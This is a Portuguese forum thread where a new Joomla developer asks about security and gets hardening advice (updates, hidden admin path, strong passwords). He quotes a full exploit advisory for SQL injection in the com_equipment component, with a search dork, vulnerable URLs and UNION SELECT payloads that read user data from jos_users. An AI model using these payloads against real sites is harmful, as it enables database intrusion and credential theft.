Preocupação com Segurança no Joomla

Estou quase concluindo o meu primeiro site em joomla e tó muito preocupado com o quesito segurança, antes de colocá-lo on-line.

pesquisando na net sobre isso me deparei com muitas coisas sobre vulnerabilidade no joomla e pra mim que está começando agora, como muitos outros é uma questão que pesa muito ao se decidir utilizar esta ferramenta para desenvolvimento de sites comerciais.

Fico pensando se é tão dificil assim ter um joomla seguro. São muitas informações explícitas sobre a forma de invadir sites desenvolvidos por esse CMS que realmente tó com preoculpado.

veja este texto que encontrei na web.

---

Joomla Component (com_equipment) SQL Injection Vulnerability

# Exploit Title : Joomla "com_equipment" Sql Injection Vulnerability
# Date : 16 - 8 - 2010
# Author : Forza-Dz
# Vendor : http://joomlaequipment.com/
# Version : All Versions
# Tested on : Win Sp2 and Mac
################################################## ##########
Dork = inurl:"com_equipment"
################################################## ##########
--- SQL Injection Vulenrability ---
SQL Injection Vulenrability component "com_equipment"
################################################## ##########
===[ Exploit ]===
http://www.site.com/path/index.php?o...ew=details&id= [SQ
L]
or
http://www.site.com/path/index.php?o...components&id=
45&sec_men_id=[SQL]
################################################## ##########
===[Injection]===
[SQL] = +Union+select+1,user(),3,4,5,6+from+jos_users--
[SQL] =
+Union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13,1 4,15,16,17+jos_users--
[SQL] =
+Union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,1 4,15,16+from+jos_users--
################################################## ##########
Greetz @ MCA-CRB All "DZ" "MusliM"
################################################## ##########
======[saha fotorkom]======
################################################## ##########


tem este trecho também de uma outra postagem:


Falhas de Joomla

Bem galera ! esse site a que irei mostrar,ele mostra as falhas mais recentes do joomla.
Vê quando entar vai gostar,mas vai pensar ! como eu vejo o exploit ? Simples ... só por o nome de falha no google ou no exploit-db.com

Espro que gostem

[url=http://www.joomlaexploit.com" onclick="window.open(this.href);return false;]http://www.joomlaexploit.com[/url]

-- Olha, esse eu nao conhecia. Para ver esses tipos de falhas, eu via no milw0rm, que por sinal é outro excelente site.

Abraços


Peço que abra um tópico mais completo sobre melhores extensões para joomla para se utilizar nas principais funções de um site em joomlal, como formulário de contato, gerenciador de download, contador de visitas, notícias etc.

Estou usando o joomla 1.5.15 diretamente no servidor locaweb. é seguro esta versão?

Cara fica tranquilo, só tome algumas atitudes seguras como ter um servidor serio 1° Lugar depois claro não use senha francas e nunca deixeo o usuario padrão do joomla ou seja o admin;
Já trabalho com joomla a mais de 02 anos tenho muitos sites e nunca tive um com problemas de invasão, mais mesmo tomo cuidado mais sem ser neorotico!!!!.

Ok Tarso, sobre isso estou usando o jsecure para esconder o admin. tó tentando usar o menos possível de extensões. mas seria interessante que o pessoal mais experientes listassem as melhores extensões para as principais atividades de um site em joomla para ficarmos dando voltas e mais voltas na net lendo diversas opiniões e nos deixando cada vez mais na dúvida.

vê meu site agora. estou trabalhando nele ainda, e coloco ele on apenas quando tó testando.

quero opiniões de pessoas como vc, com mais experiencia neste CMS.

opá, esqueci de colocar o link:

"http://www.camarapassira.com.br"

Joseilson Ferreira escreveu: Ok Tarso, sobre isso estou usando o jsecure para esconder o admin. tó tentando usar o menos possível de extensões. mas seria interessante que o pessoal mais experientes listassem as melhores extensões para as principais atividades de um site em joomla para ficarmos dando voltas e mais voltas na net lendo diversas opiniões e nos deixando cada vez mais na dúvida.

vê meu site agora. estou trabalhando nele ainda, e coloco ele on apenas quando tó testando.

quero opiniões de pessoas como vc, com mais experiencia neste CMS.

Joseilson,

Sempre deixe o seu Joomla atualizado. Estamos na versão 1.5.20. Ele já é protegido de muitos bugs que você vê na internet. A maioria deles são de versões anteriores. Enquanto mais você atualizar o joomla mais livre de ataques você estará.

Outro fator interessante é esconder o admin. Como você já fez isso pulamos essa parte.

Para finalizar... sempre use as ultimas versões dos seus componentes, módulos e plugin pois eles assim como o joomla lançam sempre versões novas para disponibilizar novos recursos e/ou arrumar possíveis bugs.

Fazendo isso e tendo um servidor de renome por trás é praticamente impossivel você ser atacado.

Espero ter ajudado.

Abraços!!!!
Marcelo Roberto